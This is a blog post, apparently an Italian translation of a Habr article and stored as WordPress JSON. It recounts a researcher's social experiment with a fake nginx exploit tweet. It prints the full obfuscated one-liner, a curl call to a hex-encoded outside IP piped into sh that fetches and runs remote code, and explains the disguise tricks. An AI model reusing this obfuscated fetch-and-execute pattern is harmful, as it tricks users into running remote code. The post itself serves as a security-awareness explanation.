{"id":35126,"date":"2019-10-31T22:02:28","date_gmt":"2019-10-31T19:02:28","guid":{"rendered":"https:\/\/prohoster.info\/blog\/uspeh-sotsialnogo-eksperimenta-s-poddelnym-eksplojtom-dlya-nginx\/"},"modified":"2019-10-31T22:02:28","modified_gmt":"2019-10-31T19:02:28","slug":"uspeh-sotsialnogo-eksperimenta-s-poddelnym-eksplojtom-dlya-nginx","status":"publish","type":"post","link":"https:\/\/prohoster.info\/it\/blog\/administrirovanie\/uspeh-sotsialnogo-eksperimenta-s-poddelnym-eksplojtom-dlya-nginx","title":{"rendered":"Il successo dell'esperimento sociale con un exploit falso per nginx","gt_translate_keys":[{"key":"rendered","format":"text"}]},"content":{"rendered":"<p><i><b>Nota di traduzione.<\/b>: <noindex><a rel=\"nofollow\" href=\"https:\/\/twitter.com\/notdan\">Autore<\/a><\/noindex> Di un appunto originale, pubblicato il 1\u00b0 giugno, ho deciso di condurre un esperimento in un ambiente di persone interessate alla sicurezza informatica. A tal fine, ha preparato un falso exploit per una vulnerabilit\u00e0 non divulgata nel web server e l'ha pubblicato su Twitter. Le sue ipotesi - essere immediatamente smascherato da esperti che avrebbero visto il chiaro inganno nel codice - non solo non si sono avverate... Hanno superato ogni aspettativa, e in senso contrario: il tweet ha ricevuto un enorme supporto da molte persone che non hanno controllato il suo contenuto.<\/i><\/p>\n<p><img decoding=\"async\" alt=\"Il successo dell&#039;esperimento sociale con un exploit falso per nginx\" src=\"\/wp-content\/uploads\/2019\/06\/20ff08c6f541176c68ef2c689b989389.jpeg\" style=\"display:block;margin: 0 auto;\" \/><br \/>\n<br \/>\n<b>TL;DR: non usare in alcun modo la pipelining dei file in sh o bash. \u00c8 un ottimo modo per perdere il controllo del computer.<\/b><noindex><a rel=\"nofollow\" name=\"habracut\"><\/a><\/noindex><\/p>\n<p>Voglio condividere con voi una breve storia su un PoC exploit umoristico che \u00e8 stato creato il 31 maggio. \u00c8 emerso rapidamente in risposta alla notizia di <noindex><a rel=\"nofollow\" href=\"https:\/\/twitter.com\/alisaesage\">Alisa Esage \u0160ev\u010denko<\/a><\/noindex>, membro <noindex><a rel=\"nofollow\" href=\"https:\/\/twitter.com\/thezdi\">Zero Day Initiative<\/a><\/noindex> (ZDI), riguardo al fatto che presto sarebbero stati divulgati dettagli su una vulnerabilit\u00e0 in NGINX che porterebbe a RCE (esecuzione remota di codice). Poich\u00e9 NGINX \u00e8 alla base di molti siti web, la notizia avrebbe dovuto avere un impatto devastante. Ma a causa dei ritardi nel processo di \"divulgazione responsabile\" le informazioni dettagliate sugli eventi non erano disponibili: \u00e8 questa la procedura standard di ZDI.<\/p>\n<p><img decoding=\"async\" alt=\"Il successo dell&#039;esperimento sociale con un exploit falso per nginx\" src=\"\/wp-content\/uploads\/2019\/06\/fba47177ff2a2d05db7942f229e145b0.jpeg\" style=\"display:block;margin: 0 auto;\" \/><br \/>\n<i><noindex><a rel=\"nofollow\" href=\"https:\/\/twitter.com\/alisaesage\/status\/1134400951043874816\">Tweet<\/a><\/noindex> sulla divulgazione della vulnerabilit\u00e0 in NGINX<\/i><\/p>\n<p>Dopo aver completato il lavoro su una nuova tecnica di offuscamento in curl, ho citato il tweet originale e ho \"rilasciato un PoC funzionante\", composto da una sola riga di codice, che apparentemente utilizzava la vulnerabilit\u00e0 scoperta. Certo, era una totale sciocchezza. Pensavo che sarei stato smascherato subito e che, nella migliore delle ipotesi, avrei ottenuto un paio di retweet (e pazienza).<\/p>\n<p><img decoding=\"async\" alt=\"Il successo dell&#039;esperimento sociale con un exploit falso per nginx\" src=\"\/wp-content\/uploads\/2019\/06\/30c8394a4bd7a151828bc3459f18f2f6.jpeg\" style=\"display:block;margin: 0 auto;\" \/><br \/>\n<i><noindex><a rel=\"nofollow\" href=\"https:\/\/twitter.com\/notdan\/status\/1134559331989434368\">Tweet<\/a><\/noindex> con un exploit falso<\/i><\/p>\n<p>Tuttavia, non potevo immaginare cosa sarebbe successo dopo. La popolarit\u00e0 del mio tweet \u00e8 esplosa. Stranamente, al momento (15:00 MSK del 1\u00b0 giugno) ancora in pochi si sono resi conto che si trattava di una fake. Molti lo ritwittano senza nemmeno verificarne il contenuto (per non parlare dell'ammirazione per la splendida grafica ASCII che visualizza).<\/p>\n<p><img decoding=\"async\" alt=\"Il successo dell&#039;esperimento sociale con un exploit falso per nginx\" src=\"\/wp-content\/uploads\/2019\/06\/a22501843edc07cf0dc49b698b1048c2.jpeg\" style=\"display:block;margin: 0 auto;\" \/><br \/>\n<i>Guardate che bellezza!<\/i><\/p>\n<p>Anche se tutti questi cicli e colori sono straordinari, \u00e8 ovvio che per vederli, le persone eseguivano il codice sulla propria macchina. Fortunatamente, i browser funzionano in modo analogo, e, con il fatto che non ho affatto bisogno di problemi legali, il codice nascosto nel mio sito eseguiva semplicemente chiamate echo, senza cercare di impostare o eseguire alcun codice aggiuntivo.<\/p>\n<p>Una piccola digressione: <noindex><a rel=\"nofollow\" href=\"https:\/\/twitter.com\/netspooky\">netspooky<\/a><\/noindex>, <noindex><a rel=\"nofollow\" href=\"https:\/\/twitter.com\/dnoiz1\">dnz<\/a><\/noindex>, io e altri ragazzi del team <noindex><a rel=\"nofollow\" href=\"https:\/\/twitter.com\/thugcrowd\">Thugcrowd<\/a><\/noindex> stiamo sperimentando da un po' con vari metodi di offuscazione dei comandi curl, perch\u00e9 \u00e8 divertente... e siamo geek. netspooky e dnz hanno scoperto alcuni nuovi metodi che mi sono sembrati estremamente promettenti. Ho deciso di unirti al divertimento e ho provato ad aggiungere conversioni di IP decimali al set di trucchi. \u00c8 emerso che \u00e8 possibile convertire gli IP anche in formato esadecimale. Inoltre, curl e la maggior parte degli altri strumenti NIX accettano volentieri gli IP esadecimali! Pertanto, era sufficiente creare una riga di comando convincente e dall'aspetto sicuro. Alla fine, mi sono fermato su questa:<\/p>\n<pre><code class=\"plaintext\">curl -gsS https:\/\/127.0.0.1-OR-VICTIM-SERVER:443\/..\/..\/..\/\/nginx-handler?\/usr\/lib\/nginx\/modules\/ngx_stream_module.so:127.0.0.1:80:\/bin\/sh&lt;&#039;protocol:TCP&#039; -O 0x0238f06a#PLToffset |sh; nc \/dev\/tcp\/localhost<\/code><\/pre>\n<p><\/p>\n<h2>L'ingegneria socio-elettronica (S.E.E.) \u00e8 pi\u00f9 di un semplice phishing<\/h2>\n<p>\nLa sicurezza e la familiarit\u00e0 sono state parte fondamentale di questo esperimento. Penso che siano state proprio queste a portarlo al successo. La riga di comando implicava chiaramente sicurezza, riferendosi a \"127.0.0.1\" (il ben noto localhost). Si considera che il localhost sia sicuro, e i dati in esso contenuti non lasciano mai il tuo computer.<\/p>\n<p>La familiarit\u00e0 \u00e8 stata il secondo componente chiave dell'S.E.E. dell'esperimento. Poich\u00e9 il pubblico target era composto principalmente da persone che conoscevano le basi della sicurezza informatica, era importante creare un codice in cui le sue parti sembrassero familiari e quindi sicure. Prendere in prestito elementi di vecchie concezioni di exploit e combinarli in modo insolito si \u00e8 rivelato molto efficace.<\/p>\n<p>Di seguito \u00e8 riportata un'analisi dettagliata del one-liner. <i>Tutto ci\u00f2 che \u00e8 presente in questo elenco \u00e8 <b>di natura cosmetica<\/b>, e per il suo funzionamento reale non \u00e8 praticamente richiesta alcuna configurazione.<\/i><\/p>\n<p>Quali componenti sono realmente necessari? Sono <code>-gsS<\/code>, <code>-O 0x0238f06a<\/code>, <code>|sh<\/code> e il server web stesso. Il server web non conteneva istruzioni malevole, ma semplicemente trasmetteva grafica ASCII tramite comandi <code>echo<\/code> nello script che si trova in <code>index.html<\/code>. Quando l'utente inseriva una stringa con <code>|sh<\/code> nel mezzo, <code>index.html<\/code> veniva caricato ed eseguito. Fortunatamente, i custodi del server web non avevano cattive intenzioni.<\/p>\n<ul>\n<li> <code>..\/..\/..\/%00<\/code> \u2014 rappresenta un'uscita al di fuori della directory;<\/li>\n<li> <code>ngx_stream_module.so<\/code> \u2014 percorso a un modulo NGINX casuale;<\/li>\n<li> <code>\/bin\/sh%00&lt;'protocol:TCP'<\/code> \u2014 stiamo presumibilmente eseguendo <code>\/bin\/sh<\/code> sulla macchina bersaglio e reindirizzando l'output a un canale TCP;<\/li>\n<li> <code>-O 0x0238f06a#PLToffset<\/code> \u2014 ingrediente segreto, completato <code>#PLToffset<\/code>, per sembrare uno spostamento di memoria, in qualche modo contenuto in PLT;<\/li>\n<li> <code>|sh;<\/code> \u2014 un altro frammento importante. Dovevamo reindirizzare l'output a sh\/bash per eseguire il codice proveniente dal server web attaccante, situato all'indirizzo <code>0x0238f06a<\/code> (<code>2.56.240.x<\/code>);<\/li>\n<li> <code>nc \/dev\/tcp\/localhost<\/code> \u2014 un falso, dove netcat si riferisce a <code>\/dev\/tcp\/localhost<\/code>, affinch\u00e9 tutto sembri di nuovo sicuro. In realt\u00e0, non fa nulla ed \u00e8 incluso nella stringa per bellezza.<\/li>\n<\/ul>\n<p>\nQui termina la decodifica dello script a riga singola e la discussione sugli aspetti della \"ingegneria socio-elettronica\" (phishing elaborato).<\/p>\n<h2>Configurazione del server web e contromisure<\/h2>\n<p>\nPoich\u00e9 la stragrande maggioranza dei miei follower sono esperti di sicurezza informatica\/hacker, ho deciso di rendere il server web un po' pi\u00f9 resistente alle manifestazioni di \"interesse\" da parte loro, solo per avere qualcosa da fare (e anche per divertirsi a configurarlo). Non intendo elencare tutte le trappole qui, poich\u00e9 l'esperimento \u00e8 ancora in corso, ma ecco alcune cose che il server fa:<\/p>\n<ul>\n<li> Monitora attivamente i tentativi di diffusione su determinate reti sociali e inserisce diverse miniature di anteprima per incoraggiare l'utente a cliccare sul link.<\/li>\n<li> Reindirizza Chrome\/Mozilla\/Safari\/ecc. a un video promozionale di Thugcrowd invece di mostrare lo script shell.<\/li>\n<li> Tiene d'occhio i SEGNI EVIDENTI di intrusione\/hacking brutale, dopo di che inizia a reindirizzare le richieste ai server NSA (ah!).<\/li>\n<li> Installa un trojan e anche un rootkit BIOS su tutti i computer i cui utenti visitano l'host da un browser normale (scherzo!).<\/li>\n<\/ul>\n<p>\n<img decoding=\"async\" alt=\"Il successo dell&#039;esperimento sociale con un exploit falso per nginx\" src=\"\/wp-content\/uploads\/2019\/06\/8ea3f0c6e2e303bef6f9ba73370d6cf1.jpeg\" style=\"display:block;margin: 0 auto;\" \/><br \/>\n<i>Una piccola parte di anti-misura<\/i><\/p>\n<p>In questo caso, il mio unico obiettivo era esplorare alcune funzionalit\u00e0 di Apache \u2014 in particolare, le interessanti regole di reindirizzamento delle richieste \u2014 e ho pensato: perch\u00e9 no?<\/p>\n<h2>Exploit NGINX (vero!)<\/h2>\n<p>\nIscriviti a <noindex><a rel=\"nofollow\" href=\"https:\/\/twitter.com\/alisaesage\">@alisaesage<\/a><\/noindex> su Twitter e segui il fantastico lavoro di ZDI per correggere vulnerabilit\u00e0 reali e opportunit\u00e0 di exploit in NGINX. Il loro lavoro mi ha sempre affascinato e sono grato ad Alice per la pazienza riguardo tutte le menzioni e le notifiche dovute al mio stupido tweet. Fortunatamente, ha portato anche a qualche beneficio: ha aiutato a sensibilizzare sulle vulnerabilit\u00e0 di NGINX e sui problemi causati dall'abuso di curl.<br \/>\n<br \/>Fonte: <a content=\"nofollow\" rel=\"nofollow\" href=\"https:\/\/habr.com\/ru\/company\/flant\/blog\/454700\/\">habr.com<\/a><\/p>","protected":false,"gt_translate_keys":[{"key":"rendered","format":"html"}]},"excerpt":{"rendered":"<p>\u041f\u0440\u0438\u043c. \u043f\u0435\u0440\u0435\u0432.: \u0410\u0432\u0442\u043e\u0440 \u043e\u0440\u0438\u0433\u0438\u043d\u0430\u043b\u044c\u043d\u043e\u0439 \u0437\u0430\u043c\u0435\u0442\u043a\u0438, \u043e\u043f\u0443\u0431\u043b\u0438\u043a\u043e\u0432\u0430\u043d\u043d\u043e\u0439 1 \u0438\u044e\u043d\u044f, \u0440\u0435\u0448\u0438\u043b \u043f\u0440\u043e\u0432\u0435\u0441\u0442\u0438 \u044d\u043a\u0441\u043f\u0435\u0440\u0438\u043c\u0435\u043d\u0442 \u0432 \u0441\u0440\u0435\u0434\u0435 \u0438\u043d\u0442\u0435\u0440\u0435\u0441\u0443\u044e\u0449\u0438\u0445\u0441\u044f \u0438\u043d\u0444\u043e\u0440\u043c\u0430\u0446\u0438\u043e\u043d\u043d\u043e\u0439 \u0431\u0435\u0437\u043e\u043f\u0430\u0441\u043d\u043e\u0441\u0442\u044c\u044e. \u0414\u043b\u044f \u044d\u0442\u043e\u0433\u043e \u043e\u043d \u043f\u043e\u0434\u0433\u043e\u0442\u043e\u0432\u0438\u043b \u043f\u043e\u0434\u0434\u0435\u043b\u044c\u043d\u044b\u0439 \u044d\u043a\u0441\u043f\u043b\u043e\u0439\u0442 \u043a \u043d\u0435\u0440\u0430\u0441\u043a\u0440\u044b\u0442\u043e\u0439 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0438 \u0432 \u0432\u0435\u0431-\u0441\u0435\u0440\u0432\u0435\u0440\u0435 \u0438 \u0440\u0430\u0437\u043c\u0435\u0441\u0442\u0438\u043b \u0435\u0433\u043e \u0432 \u0441\u0432\u043e\u0451\u043c \u0442\u0432\u0438\u0442\u0442\u0435\u0440\u0435. \u0415\u0433\u043e \u043f\u0440\u0435\u0434\u043f\u043e\u043b\u043e\u0436\u0435\u043d\u0438\u044f \u2014 \u0431\u044b\u0442\u044c \u043c\u0433\u043d\u043e\u0432\u0435\u043d\u043d\u043e \u0440\u0430\u0437\u043e\u0431\u043b\u0430\u0447\u0451\u043d\u043d\u044b\u043c \u0441\u043f\u0435\u0446\u0438\u0430\u043b\u0438\u0441\u0442\u0430\u043c\u0438, \u043a\u043e\u0442\u043e\u0440\u044b\u0435 \u0443\u0432\u0438\u0434\u044f\u0442 \u043e\u0447\u0435\u0432\u0438\u0434\u043d\u044b\u0439 \u043e\u0431\u043c\u0430\u043d \u0432 \u043a\u043e\u0434\u0435, \u2014 \u043d\u0435 \u043f\u0440\u043e\u0441\u0442\u043e \u043d\u0435 \u043e\u043f\u0440\u0430\u0432\u0434\u0430\u043b\u0438\u0441\u044c\u2026 \u041e\u043d\u0438 \u043f\u0440\u0435\u0432\u0437\u043e\u0448\u043b\u0438 \u0432\u0441\u0435 \u043e\u0436\u0438\u0434\u0430\u043d\u0438\u044f, [&hellip;]<\/p>\n","protected":false,"gt_translate_keys":[{"key":"rendered","format":"html"}]},"author":1,"featured_media":26410,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[688],"tags":[],"class_list":["post-35126","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-administrirovanie"],"aioseo_notices":[],"aioseo_head":"\n\t\t<!-- All in One SEO 5.0.1.1 - aioseo.com -->\n\t<meta name=\"description\" content=\"\u041f\u0440\u0438\u043c.\" \/>\n\t<meta name=\"robots\" content=\"max-image-preview:large\" \/>\n\t<meta name=\"author\" content=\"Yuri Gagarin\"\/>\n\t<link rel=\"canonical\" href=\"https:\/\/prohoster.info\/it\/blog\/administrirovanie\/uspeh-sotsialnogo-eksperimenta-s-poddelnym-eksplojtom-dlya-nginx\" \/>\n\t<meta name=\"generator\" content=\"All in One SEO (AIOSEO) 5.0.1.1\" \/>\n\t\t<meta property=\"og:locale\" content=\"it_IT\" \/>\n\t\t<meta property=\"og:site_name\" content=\"ProHoster | \u041a\u0443\u043f\u0438\u0442\u044c \u043d\u0430\u0434\u0435\u0436\u043d\u044b\u0439 \u0445\u043e\u0441\u0442\u0438\u043d\u0433 \u0434\u043b\u044f \u0441\u0430\u0439\u0442\u043e\u0432 \u0441 \u0437\u0430\u0449\u0438\u0442\u043e\u0439 \u043e\u0442 DDoS, VPS VDS \u0441\u0435\u0440\u0432\u0435\u0440\u044b\" \/>\n\t\t<meta property=\"og:type\" content=\"article\" \/>\n\t\t<meta property=\"og:title\" content=\"\ud83e\udd47\u0423\u0441\u043f\u0435\u0445 \u0441\u043e\u0446\u0438\u0430\u043b\u044c\u043d\u043e\u0433\u043e \u044d\u043a\u0441\u043f\u0435\u0440\u0438\u043c\u0435\u043d\u0442\u0430 \u0441 \u043f\u043e\u0434\u0434\u0435\u043b\u044c\u043d\u044b\u043c \u044d\u043a\u0441\u043f\u043b\u043e\u0439\u0442\u043e\u043c \u0434\u043b\u044f nginx | ProHoster\" \/>\n\t\t<meta property=\"og:description\" content=\"\u041f\u0440\u0438\u043c.\" \/>\n\t\t<meta property=\"og:url\" content=\"https:\/\/prohoster.info\/it\/blog\/administrirovanie\/uspeh-sotsialnogo-eksperimenta-s-poddelnym-eksplojtom-dlya-nginx\" \/>\n\t\t<meta property=\"og:image\" content=\"https:\/\/prohoster.info\/wp-content\/uploads\/2021\/11\/logo-350.jpg\" \/>\n\t\t<meta property=\"og:image:secure_url\" content=\"https:\/\/prohoster.info\/wp-content\/uploads\/2021\/11\/logo-350.jpg\" \/>\n\t\t<meta property=\"og:image:width\" content=\"350\" \/>\n\t\t<meta property=\"og:image:height\" content=\"350\" \/>\n\t\t<meta property=\"article:published_time\" content=\"2019-10-31T19:02:28+00:00\" \/>\n\t\t<meta property=\"article:modified_time\" content=\"2019-10-31T19:02:28+00:00\" \/>\n\t\t<meta property=\"article:publisher\" content=\"https:\/\/www.facebook.com\/prohoster\" \/>\n\t\t<meta property=\"article:author\" content=\"https:\/\/www.facebook.com\/prohoster\" \/>\n\t\t<!-- All in One SEO -->\n\n","aioseo_head_json":{"title":"\ud83e\udd47Successo dell'esperimento sociale con un falso exploit per nginx | ProHoster","description":"Nota.","canonical_url":"https:\/\/prohoster.info\/it\/blog\/administrirovanie\/uspeh-sotsialnogo-eksperimenta-s-poddelnym-eksplojtom-dlya-nginx","robots":"max-image-preview:large","keywords":"","webmasterTools":{"miscellaneous":""},"schema":null,"og:locale":"it_IT","og:site_name":"ProHoster | \u041a\u0443\u043f\u0438\u0442\u044c \u043d\u0430\u0434\u0435\u0436\u043d\u044b\u0439 \u0445\u043e\u0441\u0442\u0438\u043d\u0433 \u0434\u043b\u044f \u0441\u0430\u0439\u0442\u043e\u0432 \u0441 \u0437\u0430\u0449\u0438\u0442\u043e\u0439 \u043e\u0442 DDoS, VPS VDS \u0441\u0435\u0440\u0432\u0435\u0440\u044b","og:type":"article","og:title":"\ud83e\udd47\u0423\u0441\u043f\u0435\u0445 \u0441\u043e\u0446\u0438\u0430\u043b\u044c\u043d\u043e\u0433\u043e \u044d\u043a\u0441\u043f\u0435\u0440\u0438\u043c\u0435\u043d\u0442\u0430 \u0441 \u043f\u043e\u0434\u0434\u0435\u043b\u044c\u043d\u044b\u043c \u044d\u043a\u0441\u043f\u043b\u043e\u0439\u0442\u043e\u043c \u0434\u043b\u044f nginx | ProHoster","og:description":"\u041f\u0440\u0438\u043c.","og:url":"https:\/\/prohoster.info\/it\/blog\/administrirovanie\/uspeh-sotsialnogo-eksperimenta-s-poddelnym-eksplojtom-dlya-nginx","og:image":"https:\/\/prohoster.info\/wp-content\/uploads\/2021\/11\/logo-350.jpg","og:image:secure_url":"https:\/\/prohoster.info\/wp-content\/uploads\/2021\/11\/logo-350.jpg","og:image:width":350,"og:image:height":350,"article:published_time":"2019-10-31T19:02:28+00:00","article:modified_time":"2019-10-31T19:02:28+00:00","article:publisher":"https:\/\/www.facebook.com\/prohoster","article:author":"https:\/\/www.facebook.com\/prohoster"},"aioseo_meta_data":{"post_id":"35126","title":null,"description":null,"keywords":null,"keyphrases":null,"primary_term":null,"canonical_url":null,"og_title":null,"og_description":null,"og_object_type":"default","og_image_type":"default","og_image_url":null,"og_image_width":null,"og_image_height":null,"og_image_custom_url":null,"og_image_custom_fields":null,"og_video":null,"og_custom_url":null,"og_article_section":null,"og_article_tags":null,"twitter_use_og":false,"twitter_card":"default","twitter_image_type":"default","twitter_image_url":null,"twitter_image_custom_url":null,"twitter_image_custom_fields":null,"twitter_title":null,"twitter_description":null,"schema":{"blockGraphs":[],"customGraphs":[],"default":{"data":{"Article":[],"Course":[],"Dataset":[],"FAQPage":[],"Movie":[],"Person":[],"Product":[],"ProductReview":[],"Car":[],"Recipe":[],"Service":[],"SoftwareApplication":[],"WebPage":[]},"graphName":"","isEnabled":true},"graphs":[]},"schema_type":null,"schema_type_options":null,"pillar_content":false,"robots_default":true,"robots_noindex":false,"robots_noarchive":false,"robots_nosnippet":false,"robots_nofollow":false,"robots_noimageindex":false,"robots_noodp":false,"robots_notranslate":false,"robots_max_snippet":null,"robots_max_videopreview":null,"robots_max_imagepreview":"large","priority":null,"frequency":null,"local_seo":null,"seo_analyzer_scan_date":"2026-01-21 21:57:20","breadcrumb_settings":null,"limit_modified_date":false,"reviewed_by":null,"ai":null,"created":"2021-02-28 22:59:48","updated":"2026-01-21 21:57:20","focus_keyword":null,"additional_keywords":null,"truseo_locale":null},"gt_translate_keys":[{"key":"link","format":"url"}],"_links":{"self":[{"href":"https:\/\/prohoster.info\/it\/wp-json\/wp\/v2\/posts\/35126","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/prohoster.info\/it\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/prohoster.info\/it\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/prohoster.info\/it\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/prohoster.info\/it\/wp-json\/wp\/v2\/comments?post=35126"}],"version-history":[{"count":0,"href":"https:\/\/prohoster.info\/it\/wp-json\/wp\/v2\/posts\/35126\/revisions"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/prohoster.info\/it\/wp-json\/wp\/v2\/media\/26410"}],"wp:attachment":[{"href":"https:\/\/prohoster.info\/it\/wp-json\/wp\/v2\/media?parent=35126"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/prohoster.info\/it\/wp-json\/wp\/v2\/categories?post=35126"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/prohoster.info\/it\/wp-json\/wp\/v2\/tags?post=35126"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}